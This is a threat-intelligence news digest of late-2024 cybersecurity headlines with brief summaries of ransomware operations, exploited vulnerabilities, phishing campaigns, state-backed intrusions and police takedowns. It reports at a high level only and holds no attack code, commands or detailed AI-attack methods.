LockBit Admins Tease a New Ransomware Version

The LockBit ransomware group is signaling a potential comeback after a challenging period marked by a significant takedown in February 2024. On December 19, LockBitSupp, believed to be an administrator for the group, announced the forthcoming release of "LockBit 4.0," scheduled for February 3, 2025. T

Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools

Threat actors are actively exploiting a recently patched security flaw impacting Fortinet FortiClient EMS in a campaign that installs remote desktop software like AnyDesk and ScreenConnect. The vulnerability is tracked as CVE-2023-48788 (CVSS score: 9.8) and is an SQL injection bug that allows attackers to execute unauthorized code or commands by sending specially crafted data packets.

Top Data Breach Stories and Industry Trends - 2024

In a report from Security Intelligence, it was found that 2024 saw several high-profile data breaches that highlighted critical vulnerabilities across industries. Among the most notable was a breach in the healthcare sector, where attackers targeted a major hospital network, compromising sensitive patient records, insurance information, and medical histories.

Ongoing Phishing Attack Abuses Google Calendar to Bypass Spam Filters

Google Calendar, a widely used scheduling tool with over 500 million users in 41 languages, has become a significant target for cybercriminals exploiting its features to conduct phishing campaigns. Researchers at Check Point uncovered an ongoing campaign affecting over 300 brands, with more than 4,000 phishing emails sent in just four weeks.

Link Trap: GenAI Prompt Injection Attack

The rise of generative AI has introduced advanced capabilities but also new security vulnerabilities, including prompt injection attacks. Traditionally, these attacks exploit how AI processes inputs, often requiring permissions for external interactions.

Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks

Earth Koshchei (APT29/Midnight Blizzard) conducted a large-scale rogue RDP campaign in October 2024, targeting governments, military, think tanks, academic researchers, and Ukrainian entities. The group used spear-phishing emails containing malicious RDP configuration files that redirected victims' connections to rogue servers via 193 RDP relays.

New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP

QiAnXin XLab researchers have uncovered a new PHP backdoor named Glutton, observed in a global campaign targeting China, the United States, Cambodia, Pakistan, and South Africa. The malicious activity was discovered in April 2024, and Glutton has been attributed with moderate confidence to the Chinese nation-state group APT41 (Winnti). To the researchers' surprise, some of these Glutton attacks are part of targeted operations against cybercrime systems.

MUT-1244 Targeting Security Researchers, Red Teamers, and Threat Actors

Threat actor MUT-1244, tracked by Datadog, has been conducting a widespread and multifaceted campaign targeting a range of individuals, including academics, security researchers, pentesters, red teamers, and even other threat actors. The group's primary goal is to steal sensitive data such as AWS access keys, WordPress credentials, private SSH keys, bash history, and other critical system information.

New IOcontrol Malware Used in Critical Infrastructure Attacks

IOCONTROL is a custom-built IoT/OT malware linked to Iranian state-sponsored threat actors, specifically the CyberAv3ngers group. It targets critical infrastructure in Israel and the United States, including routers, IP cameras, firewalls, PLCs, HMIs, and fuel management systems such as Orpak and Gasboy devices.

Microsoft December 2024 Patch Tuesday Fixes 1 Exploited Zero-Day, 71 Flaws

As part of the December Patch Tuesday, Microsoft addressed 71 flaws, including a zero-day vulnerability that is actively being exploited in attacks in the wild. Of the 71 flaws, there were 27 elevation of privilege vulnerabilities, 30 remote code execution vulnerabilities, 7 information disclosure vulnerabilities, 5 denial of service vulnerabilities, and 1 spoofing vulnerability.

Mauri Ransomware Exploits Apache ActiveMQ Flaw

AhnLab Security Intelligence Response Center (ASEC) has released a new blog post uncovering threat actors exploiting a critical Apache ActiveMQ vulnerability, CVE-2023-46604, to deploy Mauri ransomware in attacks most recently against Korean systems.

Something to Remember Us By: Device Confiscated by Russian Authorities

According to Citizen Lab, a concerning incident has surfaced where devices confiscated by Russian authorities were returned to their owners with Monokle-type spyware installed. Monokle, a highly advanced spyware tool, is capable of extracting sensitive data such as contact lists, messages, and login credentials, while also intercepting communications and remotely activating device cameras and microphones.

U.S. Offered $10M for Hacker Just Arrested by Russia

Mikhail Matveev, known in the cybercriminal world by the aliases "Wazawaka" and "Boriselcin," has been a prominent figure in several ransomware groups responsible for extorting hundreds of millions of dollars from various sectors, including healthcare, education, government agencies, and private enterprises.

Google Deindexes Chinese Propaganda Network

Google has uncovered a sophisticated pro-China influence network operated by four public relations firms, collectively tracked as "GlassBridge." Active since at least 2022, this network has leveraged deceptive online tactics to spread Chinese state narratives to international audiences.

Zero Day Social Media and One Drive Phish

In November, we observed an increase in spear phishing attempts clicked by our user base using discreet redirect tactics. However, this report will focus on a rise in social media phishing, specifically aimed at Instagram accounts.

Forti-fied? Logging Blind Spot Revealed in FortiClient VPN

While creating an automatic credential validation system for Fortinet VPN, Pentera says it uncovered a bug that actors can exploit to potentially compromise the security of dozens of organizations. Initially, to automate the validation of credentials, Pentera attempted to use clients like OpenConnect to establish a connection, but this approach proved unreliable.

New 'Helldown' Ransomware Variant Expands Attacks to VMware and Linux Systems

Helldown, a ransomware strain derived from the leaked LockBit 3.0 codebase, has been expanding its operations, with researchers recently identifying a Linux variant. This development indicates the group's growing focus on targeting virtualized infrastructures, such as VMware. First documented in August 2024, Helldown has been described as an aggressive ransomware group targeting sectors like IT services, telecommunications, manufacturing, and healthcare.

Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape

Proofpoint has observed a significant rise in the use of the ClickFix social engineering technique, a deceptive method that tricks users into executing malicious PowerShell commands. Initially linked to campaigns by TA571 and the ClearFake threat cluster, the technique has now become a favorite across multiple financially motivated and espionage-focused threat actors.

Sitting Ducks DNS Attacks Put Global Domains at Risk

Over 1 million domains have been identified as potentially vulnerable to "Sitting Ducks" attacks, a cyber threat that exploits DNS misconfigurations, particularly lame delegation. This misconfiguration occurs when domains mistakenly point to incorrect authoritative name servers, allowing attackers to hijack domains.

5G Network AI Models: Threats and Mitigations

Modern communications networks, particularly those driven by 5G technology, are increasingly relying on Artificial Intelligence (AI) to boost performance, improve reliability, and ensure security. As these networks evolve, AI plays an essential role in real-time data processing, predictive maintenance, and optimizing traffic management.

Threats in Space (or rather, on Earth): Internet-exposed GNSS Receivers

Global Navigation Satellite Systems (GNSS), which include the U.S. GPS, Russian GLONASS, European Galileo, Chinese BeiDou, Indian NavIC, and Japanese Quasi-Zenith, serve as critical infrastructure providing essential positioning, navigation, and timing (PNT) services for a wide array of industries such as telecommunications, agriculture, finance, banking, transportation, and mobile communications.

Palo Alto Networks Firewalls, Expedition Under Attack

On November 14, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) confirmed active exploitation of two critical vulnerabilities in Palo Alto Networks' Expedition firewall configuration migration tool: CVE-2024-9463 and CVE-2024-9465. These vulnerabilities, with CVSS scores of 9.9 and 9.3 respectively, pose significant risks to affected systems.

Strela Stealer: Today's Invoice Is Tomorrow's Phish

In November 2024, IBM X-Force observed an ongoing Hive0145 campaign targeting Europe, specifically Spain, Germany, and Ukraine using Strela Stealer malware, a credential-theft tool delivered through highly tailored phishing emails. These emails, posing as legitimate invoice notifications, utilize previously compromised email credentials to blend seamlessly into legitimate email traffic.

GoIssue – The Tool Behind Recent GitHub Phishing Attacks

SlashNext researchers recently uncovered a new phishing tool called GoIssue, which allows threat actors to extract email addresses from GitHub profiles and send bulk emails to users. Advertised on cybercriminal forums, GoIssue is priced at $700 for a custom build or $3,000 for full source code access.

Phishing by Design: Two-Step Attacks Using Microsoft Visio Files

Perception Point researchers published a blog post on November 11, 2024, regarding an observed dramatic increase in two-step phishing attacks targeting hundreds of organizations by leveraging Microsoft Visio's .vsdx files. By weaponizing .vsdx files rarely used in phishing attacks, the adversary exploits user trust in the reputation of Microsoft and concurrently adds a new layer of deception designed to evade detection.

Lazarus Group Uses Extended Attributes for Code Smuggling in macOS

According to a recent report by Group-IB, the Lazarus APT group has started attempting to smuggle code utilizing custom extended attributes, which are metadata associated with files and folders in various file systems. Extended attributes allow users to store additional information beyond standard metadata like file size, timestamps, and permissions.

U.S. Agency Cautions Employees to Limit Phone Use Due to Salt Typhoon Hack of Telco Providers

The US government's Consumer Financial Protection Bureau (CFPB) has advised employees to avoid using cellphones for work after China-linked APT group Salt Typhoon breached major telecom providers. The CFPB, established in 2011 to protect consumers in the financial sector and promote fair, transparent markets, issued a directive urging employees to limit phone use and rely on Microsoft Teams and Cisco WebEx for meetings involving nonpublic data.

New Citrix Zero-Day Vulnerability Allows Remote Code Execution

Researchers at WatchTowr have disclosed new vulnerabilities in Citrix Virtual Apps and Desktops, particularly affecting the Session Recording component, which administrators use to monitor and record user sessions. These security flaws could potentially allow unauthenticated remote code execution, presenting a serious threat to affected systems.

New Ymir Ransomware Partners With RustyStealer in Attacks

Ymir, a relatively new ransomware family, has been observed by researchers at Kaspersky encrypting systems that were previously compromised by RustyStealer, an infostealer malware first documented in 2021. Ymir ransomware initiated operations in July 2024 and is known for its in-memory execution, use of PDF files as ransom notes, and extension configuration options.

New Campaign Uses Remcos RAT to Exploit Victims

Fortinet's FortiGuard Labs recently identified a phishing campaign delivering a new Remcos RAT variant through a malicious Excel document attached to a phishing email. The attack starts with a convincing email that includes the Excel file, disguised as an order form to lure the recipient into opening it.

Dark Web Profile: CosmicBeetle "NoName" Ransomware

CosmicBeetle, also known as NoName, is a ransomware-as-a-service (RaaS) operation that has been active since 2020. This group is known for exploiting known vulnerabilities, such as EternalBlue (CVE-2017-0144), and the Zerologon vulnerability (CVE-2020-1472) to infiltrate systems.

New Android Banking Malware 'ToxicPanda' Targets Users with Fraudulent Money Transfers

Cleafy's Threat Intelligence team observed a significant spike in malicious activity using a new Android malware sample in late October 2024. Initially classified as TgToxic, the sample shares similar bot commands with TgToxic, but its code differs greatly: many TgToxic capabilities are absent and some commands act as placeholders for unimplemented modules. This led Cleafy to classify the malware as a new family called ToxicPanda.

GoZone Ransomware Accuses and Threatens Victims

The GoZone ransomware, a new strain identified by SonicWall researchers, targets victims with a relatively low ransom demand of $1,000 in Bitcoin for file decryption. Written in Go, it employs Chacha20 and RSA algorithms to encrypt files, appending a ".d3prU" extension to signal compromise.

Massive PSAUX Ransomware Attack Targets 22,000 CyberPanel Instances

A critical Remote Code Execution vulnerability in CyberPanel exposed over 22,000 instances online, leading to a large-scale PSAUX ransomware attack that took most affected servers offline. This vulnerability affects CyberPanel versions 2.3.6 and likely 2.3.7 and includes three significant flaws: defective authentication, command injection, and a security filter bypass.

Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware

This sophisticated, large-scope campaign uses the widely used Facebook platform as an avenue for initial access. The threat actor has the infrastructure to impersonate ads for essentially any commonly used software, and the malware is capable of evading AV detection. The possibility of legitimate business accounts being used to propagate the malware further highlights the severity of the threat.

ReliaQuest Uncovers New Black Basta Social Engineering Technique

Researchers at ReliaQuest have uncovered a new social engineering technique employed by Black Basta ransomware actors to gain an initial foothold into victim environments. Previously, these actors would overwhelm users with email spam, prompting recipients to create a legitimate help-desk ticket to resolve the issue. From here, Black Basta operators would then contact the end user, posing as the help desk to respond to the ticket. I

Redline, Meta Infostealer Malware Operations Seized by Police

The Dutch National Police, in coordination with the FBI and other international agencies, have dismantled the network infrastructure supporting the Redline and Meta infostealer malware operations in an effort known as "Operation Magnus." This disruption serves as a direct warning to cybercriminals that their data is now in the hands of law enforcement.

LinkedIn Bots and Spear Phishers Target Job Seekers

LinkedIn, Microsoft's professional social network, serves as a vital hub for job recruiters and seekers. Unfortunately, it's also becoming a fertile ground for cybercriminals targeting unsuspecting users. Like other social platforms, LinkedIn is rife with bots that respond to specific keywords or hashtags such as "I was laid off" or "#opentowork."

AWS's Predictable Bucket Names Make Accounts Easier to Crack

In June 2024, Aqua Security discovered a security vulnerability in the AWS Cloud Development Kit (CDK), an open-source tool for building cloud infrastructure. This vulnerability could potentially allow attackers to gain administrative access to a target AWS account, allowing account hijacking for executing malicious code.

Amazon Identified Internet Domains Abused by APT29

Amazon recently seized domains used by APT 29, a Russian state-backed actor, in a mass email phishing campaign targeting government agencies, enterprises, and militaries. The campaign which was initially identified and disclosed by Ukraine's Computer Emergency Team (CERT-UA),

Scattered Spider x RansomHub: A New Partnership

In October 2024, a significant cybersecurity event involving a manufacturing firm was analyzed by ReliaQuest. The investigation attributed the breach to a group called "Scattered Spider," a collective of English-speaking cybercriminals connected to the ransomware organization "RansomHub."

Embargo Ransomware: Rock'n'Rust

In June 2024, ESET researchers identified a new ransomware group, Embargo, utilizing a Rust-based toolkit for its operations. The toolkit consists of MDeployer, a loader, and MS4Killer, an EDR killer. Both tools are designed to facilitate the deployment and execution of the Embargo ransomware.

Akira Ransomware Continues to Evolve

A new blog post by Cisco Talos shed light on the activities of Akira ransomware, noting that the group is actively creating new variants of its encryptor and refining its TTPs to adapt to shifts in the threat landscape. In 2023 Akira typically employed a double-extortion tactic where victim data was exfiltrated before encryption.

Threat Actor Abuses Gophish to Deliver New PowerRAT and DcRAT

Cisco Talos recently uncovered a phishing campaign leveraging the open-source Gophish toolkit, executed by an unknown threat actor. The campaign uses modular infection chains, either via malicious documents (maldocs) or HTML files containing JavaScript, which lead to the deployment of two Remote Access Trojans (RATs): PowerRAT, a newly identified PowerShell-based RAT, and DcRAT, a widely recognized malware.

Hackers Advertise Stolen Verizon Push-to-Talk 'Call Logs'

Cybercriminals have compromised a third-party provider linked to Verizon's Push-to-Talk systems, a service used by government agencies, first responders, and enterprises for secure internal communication. This breach, advertised on a Russian-language cybercrime forum, does not impact Verizon's core consumer network but reveals significant vulnerabilities in telecoms' security practices.

Latrodectus Malware Increasingly Used by Cybercriminals

Forcepoint has observed an increase in the use of Latrodectus malware by cybercriminals in attacks targeting the financial, automotive, and healthcare sectors. Latrodectus is a malware downloader that has been around since October 2023. The strain is believed to be developed by LunarSpider, the threat actor behind the notorious IcedID trojan, which has been used by dozens of malware families for distribution purposes.

Attackers Target Exposed Docker Remote API Servers With perfctl Malware

Attackers are exploiting exposed Docker Remote API servers to deploy the perfctl malware, utilizing a structured attack flow that begins with probing the vulnerable server and ends with payload execution and persistence. The attack starts with the attacker identifying an exposed Docker Remote API server through a ping request. Once the server is located, the attacker creates a Docker container using the ubuntu image.

VMware Fixes Bad Patch for Critical vCenter Server RCE Flaw

VMware has released a new security update for CVE-2024-38812, a critical remote code execution (RCE) vulnerability in VMware vCenter Server that wasn't fully addressed by the initial patch in September 2024. The flaw, with a CVSS score of 9.8, stems from a heap overflow issue in the DCE/RPC protocol, affecting vCenter Server and related products like vSphere and Cloud Foundation. It can be exploited without user interaction through specially crafted network packets.

ESET Partner Breached to Send Data Wipers to Israeli Orgs

Last Friday, ESET announced on X (formerly known as Twitter) that it is aware of a security incident that affected its partner company in Israel. Notably, a phishing campaign beginning on October 8th was observed, in which emails branded with ESET's logo were sent from eset[.]co[.]il, a legitimate domain operated by ESET's Israel distributor, Comsecure.

macOS HM Surf Vuln Might Already Be Under Exploit by Major Malware Family

Microsoft has urged all macOS users to update their systems due to a vulnerability (CVE-2024-44133, CVSS 5.5) patched in the September macOS Sequoia updates. The flaw may be exploited by the Adloader macOS malware family. It targets Apple's Transparency, Consent, and Control (TCC) protections, potentially allowing unauthorized access to a device's camera, microphone, and location.

ClickFix Tactic: The Phantom Meet

Researchers at Sekoia have shed light on a new social engineering tactic called ClickFix, which involves displaying fake error messages in web browsers to trick users into copying and executing malicious PowerShell code to infect targeted systems. In the last couple of months, ClickFix has been used to distribute Windows and macOS infostealers, botnets, and remote access tools.

macOS Vulnerability Could Expose User Data, Microsoft Warns

Microsoft has identified a vulnerability in macOS, named "HM Surf," that enables attackers to bypass the system's Transparency, Consent, and Control technology, which is responsible for managing user permissions for accessing sensitive data. This flaw, tracked as CVE-2024-44133, allows attackers to gain unauthorized access to user data, including browsing history, camera, microphone, and location.

Exploiting Session Fixation via Stored XSS and Cookie Jar Overflow Attack

The pentester encountered a session fixation vulnerability in a PHP web application, but knew it might not be taken seriously on its own. To demonstrate its severity, they combined it with an existing XSS vulnerability and a lesser-known technique called the Cookie Jar Overflow Attack. This combination allowed them to show how an attacker could bypass security measures and hijack user sessions.

Analysis of the Crypt Ghouls Group: Continuing the Investigation into a Series of Attacks on Russia

In December, a new ransomware group targeting Russian businesses and government agencies was identified, dubbed “Crypt Ghouls.” Investigation revealed connections to other cybercriminal groups through shared tactics, tools, and infrastructure. The group employs a variety of utilities, including Mimikatz and LockBit 3.0 for ransomware attacks, utilizing compromised contractor credentials to gain access via VPN.

North Korea Escalates Fake IT Worker Schemes to Extort Employers

Secureworks Counter Threat Unit researchers have identified evolving tactics in fraudulent employment schemes involving North Korean IT workers, linked to the NICKEL TAPESTRY threat group. These schemes involve North Korean nationals using stolen or falsified identities to secure employment at Western companies, including those in the U.S., UK, and Australia.

RansomHub Overtakes LockBit as Most Prolific Ransomware Group

According to Symantec's new report, Ransomware: Threat Level Remains High in Third Quarter, ransomware continues to be a growing threat in the cyber landscape, with Symantec observing 1,255 ransomware attacks in the third quarter of 2024. One of the biggest developments observed by Symantec in Q3 of 2024 was a decline in LockBit activity, a previously dominant player in the ransomware ecosystem.

Cronus: Ransomware Threatening Bodily Harm

Cronus is a sophisticated ransomware strain developed using .NET technology, first reported by Seqrite. This analysis arose from the discovery of a malicious document presented as a PayPal invoice, which was submitted to VirusTotal. The investigation outlines the ransomware's method of file encryption, its persistence mechanisms, and a detailed examination of its ransom note.

North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware

North Korean threat actor ScarCruft, also known as TA-RedAnt, APT37, and several other aliases, has been linked to the exploitation of a now-patched zero-day vulnerability in Windows, identified as CVE-2024-38178 (CVSS score: 7.5). This flaw, a memory corruption issue in the Windows Scripting Engine, allowed remote code execution when using Microsoft Edge in Internet Explorer Mode. Microsoft patched the vulnerability as part of its August 2024 Patch Tuesday updates.

Fake LockBit, Real Damage: Ransomware Samples Abuse AWS S3 to Steal Data

A newly discovered Golang ransomware variant has been found to abuse Amazon S3's Transfer Acceleration feature to exfiltrate data from victim machines to attacker-controlled S3 buckets. The ransomware samples analyzed contained hardcoded AWS credentials, which were used to create S3 buckets and enable faster data transfers through Amazon's globally distributed CloudFront edge locations.

Iranian Cyber Actors' Brute Force and Credential Access Activity Compromises Critical Infrastructure

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) are releasing this joint Cybersecurity Advisory to warn network defenders of Iranian cyber actors' use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors.

LLMs Are a New Type of Insider Adversary

Security teams are increasingly recognizing large language models (LLMs) as vital business tools capable of automating various tasks, thereby allowing employees to focus on more strategic functions and potentially providing a competitive advantage.

Tax Extension Malware Campaign: Threat Actors Target GitHub Comment Section to Bypass SEG

Cofense has shared insights on a phishing campaign it detected earlier this year, where actors were observed using GitHub links to bypass email security gateways and distribute malware. These links were generated through the submission of GitHub comments, which can be added to the source code repository and may include but are not limited to proposed changes, more information from a user on an issue, or documentation.

Attackers Deploying Red Teaming Tool for EDR Evasion

Threat actors are exploiting the open-source EDRSilencer tool to bypass endpoint detection and response systems, according to Trend Micro researchers. Originally designed for red teaming, EDRSilencer leverages the Windows Filtering Platform to block EDR communications by identifying and filtering EDR processes, preventing them from sending alerts or telemetry.

Iranian Hackers Now Exploit Windows Flaw to Elevate Privileges

The recent activities of Iranian state-sponsored hacking group APT34, also known as OilRig, have focused on government and critical infrastructure entities in the UAE and Gulf region. Trend Micro researchers identified a new campaign in which OilRig deployed a novel backdoor to target Microsoft Exchange servers for credential theft.

D.C. Memo: 'Cyber Incident' Forces Shutdown of OzarksGo's Linear TV Service

OzarksGo, a fiber ISP based in Fayetteville, Arkansas, experienced a cyber incident on October 7 that specifically targeted the servers responsible for providing linear TV service to approximately 4,500 customers in northwest Arkansas and northeast Oklahoma. Upon discovering the potential issue, the company acted promptly by deactivating the affected equipment and bringing in external experts to assess the situation and mitigate further impact.

Ham Radio Is Alive and Well - And Still a Lifeline in Disasters

Amateur ham radio operators have long served as vital communication links during disasters, providing essential support when conventional systems fail. Despite advancements in technology, these skilled volunteers remain prepared through training and drills, such as the Amateur Radio Emergency Service (ARES) Field Day.

Cybercriminals Are Targeting AI Conversational Platforms

Resecurity has reported a growing trend of attacks on AI conversational platforms, particularly those using Natural Language Processing and Machine Learning to simulate human-like interactions. These platforms, commonly used in industries such as finance, e-commerce, and customer support, enable personalized, automated responses to consumers.

Internet Archive Data Breach Exposes 31 Million Accounts

The Internet Archive, a nonprofit digital library known for providing free access to archived websites and digital materials, has been facing a distributed denial-of-service attack for three consecutive days, severely limiting users' ability to access the site. Alongside this DDoS attack, a data breach was discovered, exposing 31 million user accounts, including email addresses, screen names, and bcrypt-hashed passwords.

MisterioLNK: The Open-Source Builder Behind Malicious Loaders

A new, previously undetected loader builder, dubbed "MisterioLNK," has been identified by Cyble Research and Intelligence Labs (CRIL). This versatile tool, publicly accessible on GitHub, poses a significant threat to security defenses due to its ability to generate loader files that largely evade detection by conventional security systems.

To Deliver Malware, Attackers Use the Phone

There has been a recent increase in actors employing callback phishing to infect unsuspecting victims with malware. Callback phishing, otherwise known as telephone-oriented attack delivery (TOAD), is a hybrid phishing model (a combination of voice and phishing) that aims to take advantage of the trust people often assign to strangers who assume authority over the phone.

New Mamba 2FA Bypass Service Targets Microsoft 365 Accounts

Mamba 2FA is an emerging phishing-as-a-service platform that targets Microsoft 365 accounts through adversary-in-the-middle attacks. It uses highly convincing phishing login pages to steal authentication tokens, bypassing multi-factor authentication protections. Priced at $250 per month, Mamba 2FA is gaining popularity due to its accessibility and effectiveness, positioning it as one of the fastest-growing phishing platforms in the market.

Scammers Hit Florida Hurricane Victims with Fake FEMA Claims, Malware Files

In the wake of Hurricane Helene and the impending arrival of Hurricane Milton on October 9th, 2024, Florida faces another threat: a myriad of cyberattacks targeting vulnerable individuals and organizations. Veriti, a cybersecurity research firm based in Israel, identified three key emerging threats exploiting the chaos and urgency surrounding hurricane relief efforts.

New Generation of Malicious QR Codes Uncovered by Researchers

Barracuda threat analysts have identified a new wave of QR code phishing attacks, known as "quishing," that employ sophisticated techniques to bypass traditional security measures. These phishing attempts use QR codes generated from text-based ASCII/Unicode characters instead of conventional static images, making them difficult for optical character recognition systems to interpret.

31 New Ransomware Groups Join the Ecosystem in 12 Months

Secureworks' 2024 State of the Threat Report highlights a significant 30% rise in active ransomware groups over the past year, despite extensive law enforcement actions aimed at disrupting these operations. In the last 12 months, 31 new ransomware groups have emerged, shifting the landscape from a few dominant players to a more fragmented ecosystem.

U.S. and Microsoft Seize 107 Russian Domains in Major Cyber Fraud Crackdown

Last week, Microsoft and the U.S. Department of Justice (DOJ) announced that they seized 107 internet domains that were being used by Star Blizzard, a Russian nation-state actor. Sixty-six of these domains were used by Star Blizzard to target over 30 civil society organizations, including journalists, think tanks, and non-governmental organizations (NGOs), between January 2023 and August 2024.

Separating the Bee From the Panda: CeranaKeeper Making a Beeline for Thailand

A new China-aligned threat actor, dubbed CeranaKeeper, has been identified targeting governmental institutions in Southeast Asia, primarily Thailand. The group has been active since at least early 2022 and is characterized by its relentless pursuit of data exfiltration. CeranaKeeper leverages a variety of techniques and tools, including custom backdoors, exfiltration tools, and the abuse of legitimate cloud and file-sharing services like Dropbox and OneDrive, to achieve its objectives.

Mind the (Air) Gap: GoldenJackal Gooses Government Guardrails

ESET researchers uncovered a sophisticated cyberespionage campaign by the GoldenJackal APT group, targeting governmental and diplomatic entities across Europe and South Asia from 2019 to 2024. The group primarily focused on breaching air-gapped systems—networks isolated from the internet to protect highly sensitive data—using custom tools delivered via USB drives.

Hackers Pose as British Postal Carrier to Deliver Prince Ransomware in Destructive Campaign

A cybersecurity campaign targeting organizations in the U.K. and the U.S. in mid-September employed Prince Ransomware, a freely available variant advertised on GitHub for educational purposes by developer “SecDbg”. The campaign was linked to Prince Ransomware because the observed sample downloaded the same PNG from Imgur and set it as the desktop background, exactly as the Prince Ransomware configuration example on GitHub does.

Python-Based Malware Slithers Into Systems via Legit VS Code

A sophisticated cyberattack targeting organizations worldwide has been uncovered by Cyble Research and Intelligence Labs (CRIL). The threat actor (TA) employed a multi-stage attack, utilizing legitimate tools such as Visual Studio Code (VS Code) and GitHub to gain unauthorized remote access to victims' machines. The attack chain's initial access is achieved through a malicious .LNK file, disguised as a legitimate setup file, which is potentially delivered to victims through spam or phishing emails.

New MedusaLocker Ransomware Variant Deployed by Threat Actor

Researchers at Cisco Talos have uncovered a financially motivated threat actor deploying a new MedusaLocker ransomware variant, dubbed “BabyLockerKZ.” First observed in late 2023, this variant distinguishes itself from the original MedusaLocker by using unique autorun keys and an additional public-private key set stored in the registry. Despite these differences, BabyLockerKZ utilizes the same chat and leak site URLs as its predecessor, marking its first identification as a MedusaLocker variant.

Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign

Check Point Research uncovered a recent mobile malware campaign exclusively targeting cryptocurrency users through a malicious Android app disguised as the legitimate WalletConnect protocol, taking advantage of its trusted name. This fake app, identified by Check Point, employed various evasion techniques including BASE64 encoding and encryption to avoid detection, deceive users, and steal their crypto assets. It achieved high visibility in Google Play Store search results through fake reviews and consistent branding, leading to over 10,000 downloads. Another malware app identified by Check Point exhibits similar features and achieved more than 5,000 downloads. Once installed, the fake app checks whether the user is on a desktop; if so, it redirects them to a legitimate website, and otherwise it drops the MS Drainer and prompts the user to sign several transactions. The collected information is transmitted to a C2 server, which then sends commands to MS Drainer to transfer funds to the attacker's wallet. This campaign is notable because it represents the first instance of a cryptocurrency drainer focusing exclusively on mobile device users. While the exact number of victims is unknown, over 150 users are estimated to have lost funds.

Detecting CUPS Exploits: Critical Security Vulnerabilities in Linux and Unix Systems Allow Remote Co

In a recent development, researchers identified significant security vulnerabilities within the OpenPrinting Common Unix Printing System (CUPS), which is a crucial component in many Linux environments. These vulnerabilities could enable attackers to execute arbitrary code remotely, potentially compromising the integrity of affected systems. Given the widespread use of CUPS in personal and enterprise settings, this poses a substantial threat to printing and document-handling workflows, highlighting the need for immediate attention from cybersecurity professionals.

New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet

A recent discovery by Datadog Security Research has unveiled a new cryptojacking campaign targeting Docker and Kubernetes, two widely used platforms for containerized development. The attackers exploit vulnerable Docker Engine APIs exposed to the internet to deploy a cryptocurrency miner on compromised containers. The campaign then utilizes additional malicious scripts to achieve lateral movement across the network, compromising other Docker hosts, Kubernetes deployments, and even SSH servers.

Police Arrest Four Suspects Linked to LockBit

Law enforcement from 12 countries arrested four suspects tied to the LockBit ransomware gang, including a developer, a bulletproof hosting administrator, and two individuals linked to LockBit activities. These arrests were part of Operation Cronos, a global crackdown led by the UK National Crime Agency (NCA), which began in April 2022. A suspected LockBit developer was arrested in August 2024 at the request of French authorities, while two other individuals were arrested in the UK, one for LockBit affiliation and the other for money laundering. Additionally, Spain arrested a bulletproof hosting service administrator used by LockBit.

Ransomware Attack Forces UMC Health System to Divert Some Patients

Last week, Texas healthcare provider UMC Health System disclosed that it detected unusual activity within its IT systems and took steps to proactively disconnect systems to contain the incident. Due to the outage, medical prescription lists are unavailable at UMC clinics. As such, patients have been advised to bring their prescriptions with them when visiting. As a precaution, UMC decided to temporarily divert incoming emergency and non-emergency patients to nearby health facilities. In an update on Monday, the healthcare giant stated that it will start accepting patients via ambulance. However, a select number of patients will still be diverted until all UMC resources are fully functional. As of writing, the investigation is still ongoing, with UMC working with third parties to determine the full scope of the incident and recover systems as soon as possible.

Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

A critical XML external entity reference (XXE) vulnerability, tracked as CVE-2024-34102, has been exploited to compromise five percent of Adobe Commerce and Magento stores. This vulnerability, dubbed CosmicSting, has been exploited by malicious actors to gain remote code execution on vulnerable systems. The flaw was patched by Adobe on June 27th, 2024, but widespread exploitation has continued. Sansec research discovered seven different groups running large-scale campaigns utilizing this CosmicSting vulnerability.

Lumma Stealer - Using Steam Workshop as C2

An IT-ISAC member shared some indicators related to Lumma Stealer and its use of Steam Workshop for C2 communications. Lumma Stealer, a subscription-based malware active since 2022, is believed to be developed by the threat actor "Shamel" under the alias "Lumma." It is promoted on dark web forums and a Telegram channel with over a thousand subscribers, and sold for as little as $250 USD. Lumma Stealer collects system data and sensitive information such as cookies, passwords, credit card details, and cryptocurrency wallet data from compromised devices. The malware is typically delivered by users downloading trojanized software or opening malicious emails containing Lumma payloads.

Cloudflare Mitigated New Record-Breaking DDoS Attack of 3.8 Tbps

Cloudflare has shared significant insights regarding a notable increase in the frequency and severity of Distributed Denial of Service (DDoS) attacks, particularly starting from early September. During this period, the company successfully neutralized over 100 hyper-volumetric Layer 3 and Layer 4 DDoS attacks. Many of these incidents surpassed critical benchmarks, with some exceeding 2 billion packets per second (Bpps) and reaching impressive peaks of 3 terabits per second (Tbps). One of the most alarming attacks peaked at an extraordinary 3.8 Tbps, which stands as the largest DDoS attack ever made public by any organization.

Ivanti EPM Vulnerability Exploited in the Wild

In May 2024, Ivanti released patches to address a SQL injection vulnerability in its Endpoint Manager. Tracked as CVE-2024-29824, the flaw impacts the Core server of Ivanti EPM 2022 SU5 and prior, and can be exploited by an unauthenticated attacker within the same network to execute arbitrary code. In its initial advisory, Ivanti did not have evidence to suggest that the flaw was exploited in attacks in the wild. However, the vendor recently updated the advisory stating that it is aware of in-the-wild exploitation. According to Ivanti, CVE-2024-29824 has been used against “a limited number of customers.” Details of these attacks have not been disclosed at this time. CISA recently added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, advising organizations to apply patches by October 23.

Stonefly: Extortion Attacks Continue Against U.S. Targets

On July 25, 2024, Rim Jong Hyok, an alleged member of the North Korean threat group Stonefly (aka Andariel, APT45, Silent Chollima, Onyx Sleet), was indicted by the U.S. Justice Department for his involvement in extorting U.S. hospitals and other healthcare providers between 2021 and 2023, laundering the ransom proceeds, and then using these proceeds to fund additional cyberattacks against targets in the defense, technology, and government sectors worldwide.

New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking
